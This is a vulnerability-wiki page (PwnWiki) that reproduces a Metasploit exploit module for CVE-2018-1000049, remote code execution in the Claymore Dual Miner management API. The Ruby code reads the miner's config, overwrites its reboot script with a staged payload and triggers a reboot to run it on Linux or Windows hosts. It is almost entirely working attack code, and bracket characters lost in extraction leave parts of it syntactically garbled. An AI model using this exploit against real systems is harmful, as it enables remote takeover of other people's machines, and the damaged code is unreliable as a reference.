免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
EXP
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'Nanopool Claymore Dual Miner APIs RCE',
'Description' => %q{
This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.
},
'Author' =>
'email protected', # Vulnerability reporter
'email protected' # Metasploit module
,
'License' => MSF_LICENSE,
'References' =>
'EDB', '44638',
'CVE', '2018-1000049',
'URL', 'https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/'
,
'Platform' => 'win', 'linux',
'Targets' =>
'Automatic Target', { 'auto' => true },
'Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X64,
'CmdStagerFlavor' => 'bourne', 'echo', 'printf'
}
,
'Windows',
{
'Platform' => 'windows',
'Arch' => ARCH_X64,
'CmdStagerFlavor' => 'certutil', 'vbs'
}
,
'Payload' =>
{
'BadChars' => "\x00"
},
'DisclosureDate' => 'Feb 09 2018',
'DefaultTarget' => 0))
register_options(
OptPort.new('RPORT', true, 'Set miner port', 3333 )
)
deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
end
def select_target
data = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_getfile',
"params" => 'config.txt'
}.to_json
connect
sock.put(data)
buf = sock.get_once || ''
tmp = StringIO.new
tmp << buf
tmp2 = tmp.string
hex = ''
if tmp2.scan(/\w+/)7
return self.targets2
elsif tmp2.scan(/\w+/)5
return self.targets1
else
return nil
end
end
def check
target = select_target
if target.nil?
return Exploit::CheckCode::Safe
end
data = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_getfile',
"params" => 'config.txt'
}.to_json
connect
sock.put(data)
buf = sock.get_once || ''
tmp = StringIO.new
tmp << buf
tmp2 = tmp.string
hex = ''
case target'Platform'
when 'linux'
hex = tmp2.scan(/\w+/)5
when 'windows'
hex = tmp2.scan(/\w+/)7
end
str = Rex::Text.hex_to_raw(hex)
if str.include?('WARNING')
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Detected
end
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
ensure
disconnect
end
def execute_command(cmd, opts = {})
target = select_target
case target'Platform'
when 'linux'
cmd = Rex::Text.to_hex(cmd, '')
upload = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_file',
"params" => 'reboot.bash', "#{cmd}"
}.to_json
when 'windows'
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
upload = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_file',
"params" => 'reboot.bat', "#{cmd}"
}.to_json
end
connect
sock.put(upload)
buf = sock.get_once || ''
trigger_vulnerability
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
fail_with(Failure::UnexpectedReply, e.message)
ensure
disconnect
end
def trigger_vulnerability
execute = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_reboot'
}.to_json
connect
sock.put(execute)
buf = sock.get_once || ''
disconnect
end
def exploit
target = select_target
if target.nil?
fail_with(Failure::NoTarget, 'No matching target')
end
if (target'Platform'.eql?('linux') && payload_instance.name !~ /linux/i) ||
(target'Platform'.eql?('windows') && payload_instance.name !~ /windows/i)
fail_with(Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'")
end
case target'Platform'
when 'linux'
execute_cmdstager(flavor: :echo, linemax: 100000)
when 'windows'
execute_cmdstager(flavor: :vbs, linemax: 100000)
end
end
end
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
